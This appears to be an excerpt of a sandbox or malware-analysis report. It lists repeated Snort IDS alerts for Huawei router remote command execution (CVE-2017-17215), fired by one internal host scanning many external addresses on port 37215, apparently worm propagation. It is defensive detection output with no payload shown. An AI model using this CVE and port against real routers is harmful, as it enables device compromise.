          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41018 -> 41.30.180.63:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55094 -> 41.250.39.238:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55094 -> 41.250.39.238:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51310 -> 41.168.222.225:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51310 -> 41.168.222.225:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41374 -> 41.108.29.120:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41374 -> 41.108.29.120:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35582 -> 41.57.197.224:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35582 -> 41.57.197.224:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43076 -> 41.96.73.207:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43076 -> 41.96.73.207:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58926 -> 41.228.223.172:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58926 -> 41.228.223.172:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44888 -> 41.70.226.69:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44888 -> 41.70.226.69:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51300 -> 41.3.105.71:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51300 -> 41.3.105.71:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52806 -> 41.7.80.170:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52806 -> 41.7.80.170:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:40042 -> 41.71.6.90:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:40042 -> 41.71.6.90:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54126 -> 41.199.249.222:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54126 -> 41.199.249.222:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35692 -> 41.221.116.9:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35692 -> 41.221.116.9:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43314 -> 41.191.248.212:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43314 -> 41.191.248.212:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46776 -> 41.133.22.88:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46776 -> 41.133.22.88:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58906 -> 41.2.2.7:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58906 -> 41.2.2.7:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58910 -> 41.82.149.213:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58910 -> 41.82.149.213:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39022 -> 41.236.153.221:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39022 -> 41.236.153.221:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59806 -> 41.69.166.108:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59806 -> 41.69.166.108:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44324 -> 41.222.209.141:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44324 -> 41.222.209.141:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44718 -> 41.121.136.85:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44718 -> 41.121.136.85:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33546 -> 41.29.9.150:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33546 -> 41.29.9.150:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59624 -> 41.226.150.103:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59624 -> 41.226.150.103:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55242 -> 41.38.33.67:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55242 -> 41.38.33.67:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49592 -> 41.30.29.145:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49592 -> 41.30.29.145:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57842 -> 41.43.37.217:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57842 -> 41.43.37.217:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39380 -> 41.231.199.48:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39380 -> 41.231.199.48:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39660 -> 41.30.114.85:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39660 -> 41.30.114.85:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57110 -> 41.59.128.165:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57110 -> 41.59.128.165:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47286 -> 41.195.188.129:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47286 -> 41.195.188.129:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56740 -> 41.12.30.14:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56740 -> 41.12.30.14:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34718 -> 41.32.89.94:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34718 -> 41.32.89.94:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53318 -> 41.115.204.181:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53318 -> 41.115.204.181:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:32880 -> 41.251.53.244:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:32880 -> 41.251.53.244:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37790 -> 41.69.146.54:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37790 -> 41.69.146.54:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:32786 -> 41.80.116.211:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:32786 -> 41.80.116.211:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49758 -> 41.7.171.41:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49758 -> 41.7.171.41:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37500 -> 41.175.9.75:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37500 -> 41.175.9.75:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50070 -> 41.169.133.197:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50070 -> 41.169.133.197:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35136 -> 41.246.114.94:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35136 -> 41.246.114.94:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50750 -> 41.209.233.80:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50750 -> 41.209.233.80:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43468 -> 41.11.87.4:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43468 -> 41.11.87.4:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55872 -> 41.134.102.243:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55872 -> 41.134.102.243:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:48116 -> 41.4.171.169:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:48116 -> 41.4.171.169:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43220 -> 41.179.119.179:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43220 -> 41.179.119.179:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56134 -> 41.131.2.105:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56134 -> 41.131.2.105:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:59004 -> 41.166.58.90:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:59004 -> 41.166.58.90:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34268 -> 41.186.153.17:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34268 -> 41.186.153.17:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47602 -> 41.212.255.206:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47602 -> 41.212.255.206:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33566 -> 41.32.44.119:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33566 -> 41.32.44.119:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54328 -> 41.212.40.78:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54328 -> 41.212.40.78:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56062 -> 41.38.129.201:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56062 -> 41.38.129.201:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57650 -> 41.107.96.129:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57650 -> 41.107.96.129:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52150 -> 41.43.22.80:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52150 -> 41.43.22.80:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56946 -> 41.116.80.24:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56946 -> 41.116.80.24:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50760 -> 41.227.2.31:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50760 -> 41.227.2.31:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33594 -> 41.31.62.54:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33594 -> 41.31.62.54:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39682 -> 41.1.204.182:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39682 -> 41.1.204.182:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41306 -> 41.23.5.167:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41306 -> 41.23.5.167:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51340 -> 41.141.140.45:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51340 -> 41.141.140.45:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47532 -> 41.181.2.82:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47532 -> 41.181.2.82:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41054 -> 41.187.101.233:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41054 -> 41.187.101.233:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:51610 -> 41.99.124.97:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:51610 -> 41.99.124.97:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39568 -> 41.159.234.251:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39568 -> 41.159.234.251:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:54000 -> 41.207.57.34:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:54000 -> 41.207.57.34:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35474 -> 41.107.89.148:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35474 -> 41.107.89.148:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43974 -> 41.103.102.76:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43974 -> 41.103.102.76:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33220 -> 41.147.68.126:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33220 -> 41.147.68.126:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:33042 -> 41.243.193.17:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:33042 -> 41.243.193.17:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:56190 -> 41.97.197.95:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:56190 -> 41.97.197.95:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:37568 -> 41.95.54.112:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:37568 -> 41.95.54.112:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43934 -> 41.29.18.161:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43934 -> 41.29.18.161:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50940 -> 41.201.117.49:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50940 -> 41.201.117.49:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44618 -> 41.115.214.129:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44618 -> 41.115.214.129:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46424 -> 41.62.232.99:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46424 -> 41.62.232.99:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58650 -> 41.230.63.65:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58650 -> 41.230.63.65:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41036 -> 41.220.217.205:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41036 -> 41.220.217.205:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43824 -> 41.147.171.226:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43824 -> 41.147.171.226:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:50044 -> 41.58.38.118:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:50044 -> 41.58.38.118:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41618 -> 41.101.164.171:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:41618 -> 41.101.164.171:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36124 -> 41.115.187.135:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36124 -> 41.115.187.135:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39408 -> 41.61.252.144:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39408 -> 41.61.252.144:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35100 -> 41.7.19.35:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35100 -> 41.7.19.35:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:34658 -> 41.121.93.202:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:34658 -> 41.121.93.202:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44202 -> 41.198.72.91:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44202 -> 41.198.72.91:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43926 -> 41.16.91.70:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43926 -> 41.16.91.70:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46406 -> 41.229.182.88:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46406 -> 41.229.182.88:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:49280 -> 41.131.96.183:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:49280 -> 41.131.96.183:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53018 -> 41.165.83.24:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53018 -> 41.165.83.24:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47980 -> 41.13.215.15:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47980 -> 41.13.215.15:37215
